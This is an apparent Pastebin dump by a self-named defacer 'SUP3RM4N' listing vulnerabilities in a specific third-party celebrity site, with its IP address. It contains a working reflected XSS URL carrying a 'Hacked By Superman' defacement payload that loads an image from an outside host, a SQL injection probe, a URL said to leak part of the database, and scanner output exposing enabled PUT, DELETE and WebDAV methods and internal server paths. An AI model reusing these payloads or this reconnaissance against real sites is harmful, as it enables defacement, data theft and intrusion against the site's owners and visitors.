supermanavc

angelica.globo.com

Apr 15th, 2013
1,430
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ANGELICA.GLOBO.COM - SUP3RM4N
  2. ---------------------------------------------------------------------------
  3. + Target IP: 201.7.176.72
  4. + Target Hostname: angelica.globo.com
  5. + Target Port: 80
  6. + Start Time: 2013-04-15 21:56:57 (GMT-3)
  7. ---------------------------------------------------------------------------
  8. XSS:http://angelica.globo.com/galeriaFotosPessoal.php?dir='%22--%3E%3E%22%3E%3Cmarquee%3E%3Ccenter%3E%3Ch1%3EHacked+By+Superman%20%3C/h1%3E%3Cimg+src%3Dhttp://linux.meuhobby.com/themes/galeriatux/Supermantux.png%3E%3C/marquee%3E&pageLabelBoost=
  9.  
  10. Programming Error Message:http://angelica.globo.com/galeriaFotosPessoal.php?dir=27%20order%20by%205--
  11.  
  12. APACHE LEAK:http://angelica.globo.com/icons/README
  13.  
  14. Permite baixar parte da db:http://angelica.globo.com/galeriaFotosPessoal.php/cab/angelica.ico
  15. http://angelica.globo.com/galeriaFotosPessoal.php/vgn/login/1,501,,00.html?cookieName=x--\
  16.  
  17. + Server: No banner retrieved
  18. + Server leaks inodes via ETags, header found with file /, inode: 6023887, size:
  19. 235, mtime: 0x4fe09989
  20. + The anti-clickjacking X-Frame-Options header is not present.
  21. + Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE, POST, PUT, DELETE, CONNECT, P
  22. ATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK
  23. + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to s
  24. ave files on the web server.
  25. + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove
  26. files on the web server.
  27. + HTTP method ('Allow' Header): 'CONNECT' may allow server to proxy client reque
  28. sts.
  29. + OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change f
  30. ile locations on the web server.
  31. + WebDAV enabled (UNLOCK LOCK MKCOL COPY PROPPATCH PROPFIND listed as allowed)
  32. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to X
  33. ST
  34. + OSVDB-3233: /icons/README: Apache default file found.
  35.  
  36. Internal Path Disclosure :
  37. /mnt/filer/httpd-clientes/parceiros/angelica/wwwtexto/legendas.txt
  38. /mnt/filer/httpd-clientes/parceiros/angelica/www/revistas-capas.php
  39. /mnt/filer/httpd-clientes/parceiros/angelica/wwwtexto/titulos.txt
  40. /mnt/filer/httpd-clientes/parceiros/angelica/wwwtexto/legendas.txt
  41. /mnt/filer/httpd-clientes/parceiros/angelica/www/galeriaFotosEstrelas.php
  42. /mnt/filer/httpd-clientes/parceiros/angelica/wwwtexto/titulos.txt
  43.  
  44. + /galeriaFotosPessoal.php/: PHP include error reveals the full path to the web
  45. root.
  46. + /galeriaFotosPessoal.php/1Jy5CGSq.dat: PHP include error reveals the full path
  47. to the web root.
  48. + /galeriaFotosPessoal.php/1Jy5CGSq.conf: PHP include error reveals the full pat
  49. h to the web root.
  50. + No CGI Directories found (use '-C all' to force check all possible dirs)
  51. + /galeriaFotosPessoal.php/clientaccesspolicy.xml: PHP include error reveals the
  52. full path to the web root.
  53. + /galeriaFotosPessoal.php/robots.txt: PHP include error reveals the full path t
  54. o the web root.
  55. + /galeriaFotosPessoal.php/~root: PHP include error reveals the full path to the
  56. web root.
  57. + /galeriaFotosPessoal.php/hp/device/this.LCDispatcher: PHP include error reveal
  58. s the full path to the web root.
  59. + /galeriaFotosPessoal.php/hmstat.htm: PHP include error reveals the full path t
  60. o the web root.
  61. + /galeriaFotosPessoal.php/SoundBridgeStatus.html: PHP include error reveals the
  62. full path to the web root.
  63. + /galeriaFotosPessoal.php/eng/start/StatPtrGen.htm: PHP include error reveals t
  64. he full path to the web root.
  65. + /galeriaFotosPessoal.php/cab/top.shtml: PHP include error reveals the full pat
  66. h to the web root.
  67. + /galeriaFotosPessoal.php/home.asp: PHP include error reveals the full path to
  68. the web root.
  69. + /galeriaFotosPessoal.php/favicon.ico: PHP include error reveals the full path
  70. to the web root.
  71. + /galeriaFotosPessoal.php/index.asp: PHP include error reveals the full path to
  72. the web root.
  73. + Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
  74. + DEBUG HTTP verb may show server debugging information. See http://msdn.microso
  75. ft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
  76. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to X
  77. ST
  78.  
  79. #SUP3RM4N
RAW Paste Data